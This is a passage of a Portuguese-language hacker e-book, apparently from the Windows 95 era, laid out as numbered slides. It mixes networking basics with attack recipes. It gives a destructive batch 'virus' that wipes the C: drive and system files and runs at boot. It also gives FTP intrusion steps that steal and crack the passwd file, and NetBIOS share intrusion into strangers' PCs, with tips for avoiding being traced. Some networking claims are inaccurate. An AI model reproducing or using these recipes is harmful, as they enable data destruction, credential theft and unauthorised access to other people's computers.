  • 21. @ECHO OFF BREAK OFF DEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE QUER FAZER. VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS ARQUIVOS DO PC ALHEIO. VOCÊ DEVE USAR OS SEGUINTES COMANDOS: DELTREE/Y C:*.* CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA, USE OS SEGUINTES COMANDOS: DEL C:AUTOEXEC.BAT DEL C:COMMAND.COM DEL C:CONFIG.SYS É UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR OS SEUS VÍRUS E PARA QUE ELES FAÇAM O QUE VOCÊ QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO VÍRUS).BAT AUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA DE ESTAR EXECUTANDO O SEU VÍRUS AO INICIAR O COMPUTADOR ALVO. DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO .BAT, DE FORMA QUE FIQUE: OQUEQUISER.BAT. AGORA O SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O VÍRUS IRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS. IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA DISQUETE, VOCÊ NÃO DEVE ESQUECER DE 21
  • 22. FINALIZAR O ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE PARA NÃO DEIXAR VESTÍGIO DO SEU ATO INSANO. TELNET É O PROTOCOLO INTERNET PARA ESTABELECER CONEXÃO ENTRE COMPUTADORES. ATRAVÉS DESSA CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E COMANDOS EM OUTRA MÁQUINA, COMO SE O TECLADO DE SEU COMPUTADOR ESTIVESSE LIGADO DIRETAMENTE A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É SEMELHANTE AO QUE SE TEM EM BBS’S DE INTERFACE DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DA MESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE COMANDOS UNIX OU A PARTIR DE UM MENU DE COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM ALGUM LUGAR DA TELA (ESTA ÚLTIMA É A MAIS COMUM ESTRE SERVIDORES QUE PERMITEM ACESSO AO PÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA DE INFORMAÇÕES E TRANFERÊNCIA DE ARQUIVOS – TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁ CONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É MUITO USADO POR OPERADORES DE SISTEMAS (SYSOPS) A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ PENSA QUE O SYSOP DE SEU PROVEDOR SAI DE CASA TODA VEZ QUE TEM ALGUM PROBLEMA NOS SERVIDORES, ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A MANUTENÇÃO DE CASA MESMO, VIA TELNET. PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO UM PROGRAMA ESPECÍFICO. O WINDOWS 95 JÁ VEM COM UM. CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA NA PASTA WINDOWS, CLIQUE EM CONECTA, SISTEMA REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO AO QUAL DESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E "TIPO DO TERMINAL" SELECIONE TELNET VT100. FEITO ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A CONEXÃO COM O COMPUTADOR REMOTO. FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O SISTEMA REMOTO PEDE UMA SENHA. DIGITE "GUEST" E APERTE ENTER. ISTO ABRIRÁ AS PORTAS DO COMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA SÉRIE DE OPÇÕES, PRECEDIDAS DE UM NÚMERO OU LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS, DIGITE ALGUM DESSES NÚMEROS OU LETRAS E APERTE ENTER. EXPLORE O SISTEMA AO QUAL VOÊ CONECTOU PARA EXERCITAR. COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS SERVIDORES NÃO PERMITE ACESSO AO PÚBLICO VIA TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE ENTRADA PARA HACKERS. NESTES SERVIDORES NÃO SE ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELO SITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A NECESSIDADE DE CONHCER ALGUNS 22
  • 23. COMANDOS BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS VEZES VAI TER ACESSSO A PROVEDORES DE PRESENÇA, DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUAR ALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE ABAIXO UMA LISTA QUE LHE SERÃO MUUITO ÚTEIS NESTE CASO: LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIO LS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO, INCLUSIVE OS HIDDEN CP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIO Y MV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIOY RM X: DELETA O ARQUIVO X CD XXX: MUDA O DIRETÓRIO ATIVO PARA XXX CD..: SAI DE UM DIRETÓRIO MKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO ATUAL RM XXX: REMOVE O DIREÓRIO XXX OS PROTOCOLOS TCP/IP PARA ENTENDER COMO ATAQUES FUNCIONAM, É NECESSÁRIO TER UMA PEQUENA NOÇÃO DE COMO TRABALHA A INTERNET, OU PELO MENOS COMO FUNCIONA A SUA BASE DE PROTOCOLOS DE COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É CHAMADA TCP/IP. COMO SABEMOS, CADA COMPUTADOR LIGADO À INTERNET É IDENTIFICADO POR UM NÚMERO DE IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM NÚMERO DE IP FIXO, CADA VEZ QUE SE CONECTAM AO PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR 23
  • 24. DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA MÁQUINA DENTRE MILHÕES CONECTADAS A INTERNET, ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA TROQUE INFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM MESMO ENDEREÇO DE IP 200.230.137.4 PODE SER UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP. COMO UM CLIENTE DE WWW PEDE UM SERVIÇO PARA ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUS DIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE SURGE UM IMPORTANTE CONCEITO, MUITAS VEZES NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARA PREENCHER OS VÁRIOS TIPOS DE ATAQUES DE CRACKERS, QUE É O DA "PORTA". AGORA, ALÉM DE DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS IDENTIFICAR OS SERVIÇOS QUE ELAS PRESTAM, E CADA UM DELES É IDENTIFICADO COM UM NÚMERO DIFERENTE. ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS CONFUSÃO. POR EXEMPLO, PARA UTILIZAR O SERVIÇO DE WWW DA NOSSA MÁQUINA 200.230.137.4, BASTA ABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA A PORTA 21, O ICQ USA PORTAS NA FAIXA 1000-2000, E IRC PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535 NÚMEROS DISPONÍVEIS PARA SEREM UTILIZADOS EM UMA ÚNICA MÁQUINA. QUANTO MAIS SERVIÇOS A MÁQUINA OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO DISPONIBILIZADOS. ATÉ MESMO A SUA MÁQUINA WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECE SERVIÇO NENHUM, TEM PORTAS ABERTAS. A COLETA DE DADOS UM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É AQUELE QUE EXPLORA A VULNERABILIDADE EXISTENTE EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA. COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É ACESSADO ATRAVÉS DA CAMADATCP/IP, E SÃO IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AO PRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO DO TCP/IP TAMBÉM SÃO FREQUENTES, COMO IREMOS VER A SERGUIR. PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA SERGURANÇA NOS VÁRIOS SISTEMAS DE SUA MÁQUINA, ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL. EXSTEM DOIS MÉTODOS BASTANTE UTILIZADOS PARA ESTE TIPO DE COLETA DE DADOS. A VARREDURA DE PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL (FINGERPRINT) DO SISTEMA OPERACIONAL. PORT SCANS USANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA SONDAS (PACOTES IP ESPECIAIS), TENTANDO ESTABELECER CONEXÕES COM CADA UMA DAS 65535 PORTAS DO SEU COMPUTADOR. SE EXISTE ALGUM SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ 24
  • 25. RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE SABER, EM POUCOS SEGUNDOS, O QUE ESTÁ RODANDO EM SUA MÁQUINA. IMPRESSÃO DIGITAL ATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE PACOTES IP A UM SITE ESPECÍFICO, PODE-SE DETECTAR QUE SISTEMA OPERACIONAL ESTÁ RODANDO ANALIZANDO OS PACOTES QUE ELE ENVIA DE VOLTA. COM POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUE FERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU VANDALIZAR O SEU MICRO. E É NESTE PONTO QUE VOCÊ DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A ALMA DO NEGÓCIO. A INVASÃO DE SISTEMAS É BASICAMENTE UMA TAREFA DE PESQUISA E COLETA DE DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ ESTIVER, MENOS CHANCES TERÁ DE RECEBER UM ATAQUE NO FUTURO. INVADINDO FTP´S ATAQUE POR FTP (ML HACKING) INGREDIENTES: COMPUTADOR LIGADO À INTERNET PROGRAMA FTP.EXE UM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O PROGRAMA NÃO RODA DIREITO. E UM PROVEDOR DE INTERNET PEQUENO A GOSTO. MODO DE PREPARO: LIGUE O COMPUTADOR. CONECTE-SE À INTERNET. CLIQUE EM INICIAR OU START, DEPENEENDO DO RUINDOWS. CLIQUE EM EXECUTAR. 25
  • 26. DIGITE FTP E CLIQUE EM OK. DEPOIS O PROGRAMA COMEÇARÁ. AÍ VOCÊ VERÁ "FTP>" DAÍ DIGITE OPEN www.provedor .COM.BR NO LOGIN DIGITE: "ANONYMOUS" NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O SEU E TEM QUE SER UM QUE NÃO CHAME MUITO A ATENÇÃO. VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E AGORA? O QUE FAZER? EU IREI LEVÁ- LO AO ARQUIVO QUE CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O QUE QUISER EM OUTRO PROVEDOR. DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E DIRETÓRIOS DO PROVEDOR. SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA MUDAR O DIRETÓRIO, SE NÃO TIVER DIGITE CLOSE. DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE GET PASSWD, SE NÃO DIGITE CLOSE. PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA JACK QUE TIRA AS SENHAS DO ARQUIVO. COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA DE DADOS, QUE EU ESQUECI O NOME COLOQUE A SUA WORDLIST. SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O DO MS-DOS. VÁ AO PROMPT E DIGITE FTP. IRÁ APARECER O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO PROMPT. DITE ENTÃO O ENDEREÇO DO HOST PU O SEU IP. AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD, TENTE USAR OS PASSWORDS DO UNIX, SE NÃO DER VOCÊ PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL? NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE NOVAMENTE. DEPOIS DIGITE "QUOTE USER FTP", DÊ UM ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER 26
  • 27. NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ ESTÁ HACKEANDO... NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S, QUE É LOGIN ANONYMOUS PASSWORD E-MAIL, POIS SERÁ APLICADO O MODO DE PROTEÇÃO... MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO? AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN, TIPO HOMEROOT. DAÍ, PARA VER A LISTA DE USERS VOCÊ VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM USUÁRIO. NÃO TENTEM PEGAR AS SENHAS POIS ESTÃO CRIPTOGRAFADAS, POIS A MAIORIA DOS USERS USA A MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS COMANDOS DE FTP, DIGITE ? E TECLE ENTER. DAÍ, É SÓ HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UM PROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É CADEIA!!!!!!. FTP DO DOS COMANDOS FUNÇÕES APPEND ACRESCENTAR UM ARQUIVO ASCII DEFINIR UM TIPO DE TRANFERÊNCIA ASCII BELL EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO BINARY DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA 27
  • 28. BYE TERMINAR SEÇÃO DE FTP E SAIR CD ALTERAR A PASTA DE TRABALHO REMOTA CLOSE TERMINAR SESSÃO DE FTP DELETE EXCLUIR PASTAS DE TRABALHO REMOTA DEBUG LIGAR/DESLIGAR MODO DE DEPURAÇÃO DIR LISTAR CONTEÚDO DA PASTA REMOTA DISCONNECT TERMINAR SESSÃO DE FTP GET RECEBER ARQUIVO GLOB 28
  • 29. LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS HASH LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDO HELP AJUDA DO FTP LCD ALTERAR A PASTA DE TRABALHO LOCAL LITERAL ENVIAR UM COMANDO DE FTP ARBITÁRIO LS LISTAR O CONTEÚDO DA PASTA REMOTA MDELETE EXCLUI VÁRIOS ARQUIVOS MDIR LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS M GET OBTER VÁRIOS ARQUIVOS 29
  • 30. MKDIR CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA MLS LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS MPUT ENVIAR VÁRIOS ARQUIVOS OPEN CONECTAR AO FTP REMOTO PROMPT FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS PUT ENVIAR UM ARQUIVO PWD IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA QUIT TERMINAR A SESSÃO DE FTP E SAIR QUOT ENVIAR UM COMANDO ARBITRÁRIO 30
  • 31. RECV RECEBER ARQUIVO REMOTEHELP OBTER AJUDA A PARTIR DO SERVIDOR REMOTO RENAME RENOMEAR ARQUIVO RMDIR REMOVER PASTA DA MÁQUINA REMOTA SEND ENVIAR ARQUIVO STATUS MOSTRAR STATUS ATUAL TRACE LIGAR/DESLIGAR RASTREAMENTO DE PACOTES TYPE DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS USER 31
  • 32. ENVIAR INFORMAÇÕES DE NOVO USUÁRIO VERBOSE Invasão por IP Passa-a-passo: 1º- Certifique-se de que você possui este programa nbstat: 2º- Vá ao Prompt do MS-DOS. 3º- Digite: nbtstat -a o IP do cara que você quer invadir 4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas) 5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome. 6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei) 7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC. 8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK" 9º- Pronto! Você invadiu por IP! 32
  • 33. 10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas do lammaH e se achar algo interessante pega para você. OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windowssystem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir. PROTOCOLOS DE REDE TCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS USADOS NA INTERNET. ELE INCLUI UMA SÉRIE DE PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES VÃO SE COMUNICAR E CRIA CONVENÇÕES PARA INTERCONECTAR REDES PARA O ROUTEAMENTO ATRAVÉS DESSAS CONEXÕES. OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO DO PROJETO DA DARPA, SOBRE CONECTIVIDADE ENTRE REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM TODAS AS REDES DE LONGA DOSTÂNCIA DO SISTEMA DE DEFESA DOS EUA EM 1983, MAS NÃO FOI RAPIDAMENTE ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2. A POPULARIDADE DO TCP/IP É BASEADO EM: ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É UMA ÓTIMA PLATAFORMA CLIENTE SERVIDOR, ESPECIALMENTE EM AMBIENTES WAN. COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE INFORMAÇÕES MILITARES, EDUCACIONAIS, CIENTÍFICAS, E COMERCIAIS COMPARTILHAM DADOS, CORREIO ELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO O TCP/IP. AMPLA DISPONIBILIDADE. IMPLEMENTAÇÕES DO TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTE TODOS OS SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É AMPLAMENTE DISPONÍVEL EM VÁRIAS IMPLEMENTAÇÕES. FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES DE REDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS PRODUTOS. CONCEITOS EXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS EM RELAÇÃO AO TCP/IP E DE 33
  • 34. REDES QUE O UTILIZAM. NÚMERO EXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E TELEFONES E O NÚMERO DE IP É UMA DELAS. VOCÊ PODE IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE TELEFONE COM TODOS OS CÓDIGOS DE DISCAGEM INTERNACIONAL. ISTO SE SIGNIFICA QUE QUALQUER MÁQUINA PODE SE CONECTAR A OUTRO USANDO O NÚMERO DE IP, BASTADO QUE EXISTA APENAS UM CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA NA REDE TEM DE TER UM NÚMERO DE IP. ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA REDE NÃO PODEM TER O MESMO NÉMERO DE IP. ESTA RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA REDE, POIS MÁQUINAS NUMA REDE NÃO CONECTADA USUALMENTE TEM NÚMERO DE IP IGUAIS, POR ALGUMAS CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM TELEFONES, IMAGINE DUAS PESSOAS MORANDO EM PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO DE TELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE CASO NÃO HÁ CONFLITO. O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM FORMATO ESPECÍFICO XXX.XXX.XXX.XXX (EXEMPLO: 200.212.235.122). ISSO SIGNIFICA QUE CADA AGRUPAMENTO PODE IR DE 0 À 255 (POIS ESSA É A CAPACIDADE DE 1 BYTE) MÁSCARA EXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A, B, C. A DIFERENÇA ENTRE AS CLASSES É A FORMA DE COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO DE IP É DIVIDO EM DUAS PARTES: O ENDEREÇO DA REDE EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERO DE IP DA SEGUINTE FORMA: W.X.Y.Z. CLASSE N º DE IP INDICADOR DA REDE 34
  • 35. INDICADOR DA SUB REDE NºDE REDES DISPONÍVEIS NºDE SUB REDES DISPONÍVEIS A 1.126 w x.y.z 126 16,777,214 B 128.191 w.x y.z 16,384 65,534 C 192.223 w.x.y z 2,097,151 254 OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM REDES INTERNAS, O ENEREÇO 127 É UTILIZADO PARA TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO RESERVADOS PARA 35
  • 36. PROTOCOLOS ESPECIAIS. UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE ATRAVÉS DE UMA REDE PERTENCENTE À INTERNET. A REDE PERTENCENTE RECEBE UM NÚMERO DE IP E DITRIBUI O NÚMERO DE IP DENTRO DE SUA SUB REDE. AS CLASSES APENAS DEFINEM QUEANTAS SUB REDES UM NÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM 126 NÚMEROS DE IP DQA CLASSE A E CADA UM DELES PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO PODE IMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE CLASSE A E B NA INTERNET, E QUE OS DA CLASSE C ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO DESSES NÚMEROS. AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO NÚMERO DE IP. A PRIMEIRA VISTA PARECE DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO NÚMERO DO IP PARA DETERMINAR A CLASSE. MAS ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODE FUNCIONAR COMO UM DA CLASSE B OU CLASSE C, DEPENDENDO DA ESTRUTURA INTERNA DA SUA SUB REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200 FILIAIS NO BRASIL CONECTADAS POR UMA REDE PRÓPRIA. A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A, DIGAMOS 100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE FORMA: 100.1.0.0 Matriz 100.2.0.0 Filial 1 100.3.0.0 Filial 2 100.201.0.0 Filial 200 36
  • 37. PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE B, POIS SÓ TEM 16.384 SUBREDES DISPONÍVEIS, EMBORA COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL SE DISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS DE IP CLASSE C. PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE, OS COMPUTADORES PRECISAM SABER QUAL A CLASSE DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES: Classe Máscara de Sub-rede A 255.0.0.0 B 255.255.0.0 C 255.255.255.0 GATEWAY GATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS AJUDA QUANDO NÃO CONSEGUIMOS ACHAR UMA OUTRA MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMA MÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA, ELA EMITE UM PEDIDO DE CONEXÃO (ESSE PEDIDO É FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA QUE ENVIA O PEDIDO A TODA A REDE, E APENAS A MÁQUINA DESTINO RESONDE), E AGUARDA UMA RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO COM O GATEWAY PADRÃO E 37
  • 38. SOLICITA QUE O MESMO CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY CONSEGUIR CONECTAR À MÁQUINA DESTINO, ELE FICA COMO INTERMEDIADOR DESSA CONEXÃO, CASO CONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO FOI POSSÍVEL ENCONTRAR A MÁQUINA DESTINO. ESSA ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGO DESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A CONEXÃO REALIZADA NA INTERNET (E TODAS AS REDES CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS COMPUTADORES LIGADAS A ELA. SERIA UM TRÁFEGO MUITO GRANDE. AO INVÉS DISSO, O BROADCAST É DIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA NETWORK OU REDE LOCAL) DEPOIS NA WAN DE SUA CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ CHEGAR NA WAN INTERNACIONAL. REDUZ-SE DESSE MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANS ALIVIANDO AS LINHAS DE CONEXÃO. DNS ESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A MAIORIA DAS PESSOAS, MAS ELAS DIGNIFICAM DOMAIN NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO SIGNIFICAM COISA ALGUMA PARA A MIORIA DAS PESSOAS, POR ISSO, VAMOS À ANALOGIA COM O TELEFONE. QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA ESQUINA, VOCÊ CONSULTA O CATÁLOGO, DESCOBRE O TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE TELEFONAR PARA ALGUM LUGAR SE NÃO SOUBER O NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA. OS USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS MÁQUINAS, E SIM OS NOMES. MAS PARA SE ALCANÇAR UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO DE IP. PARA RESOLVER ISSO FOI CRIADO O DNS, UM SERVIÇO DISPONÍVEL NA REDE QUE, DADO UM NOME DE MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA. EXISTE UMA PARTICULARIDADE AQUI. NO CASO DA REDE LOCAL ESTAR CONECTADA A ALGUMA OUTRA, É RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA EXECUTADO NA MÁQUINA DE LIGAÇÃO ENTRE AS DUAS REDES (O GATEWAY), PARA CASO DE O NOME REQUISITADO NÃO EXISTIR NA REDE LOCAL , O DNS POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA PESQUISAR O TAL NOME. O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O WINS (WINDOWS INTERNET NEME SYSTEM OU SISTEMA DE NOMES DA INTERNET DO WINDOWS). A PRINCIPAL DIFERENÇA ENTRE OS DOIS É QUE O DNS USA UMA TABELA ESTÁTICA, E O WINS USA UMA TABELA DINÂMICA. NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO WINDOWS NT É RECOMENDÁVEL QUE ELE SEJA SUSTIUÍDO PELO WINS. DHCP MAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA PARA A MIORIA DOS USUÁRIOS. MAS INFELIZMENTE NÃO EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO VAMOS 38
  • 39. DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC HOST CONFIGURATION PROTOCOL", OU SEJA: PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO. NIAM REDE TCP/IP, TODO COMPUTADOR, TODO COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO SIGNIFICA QUE ANTES DE COLOCAR UMA NOVA MÁQUINA NA REDE, O ADMINISTRADOR TERIA DE IDENTIFICAR QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA ESCOLHER UM NÚMERO ADEQUADO PARA A NOVA MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER FEITO, MAS EM GRANDES REDES ISSO SE TORNA UMA TAREFA TEDIOSA E SUJEITA A FALHAS. PARA EVITAR ISSO FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA REDE, ELA PROCURA O SERVIDOR DHCP (CUJO NÚMERO DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UM NÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA QUAL O NÚMERO DISPONÍVEL, INFORMA AO SOLICITANTE ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURAS SOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS NÚMEROS DE IP SÃO FEITAS AUTOMATICAMENTE E NÃO EXISTEM 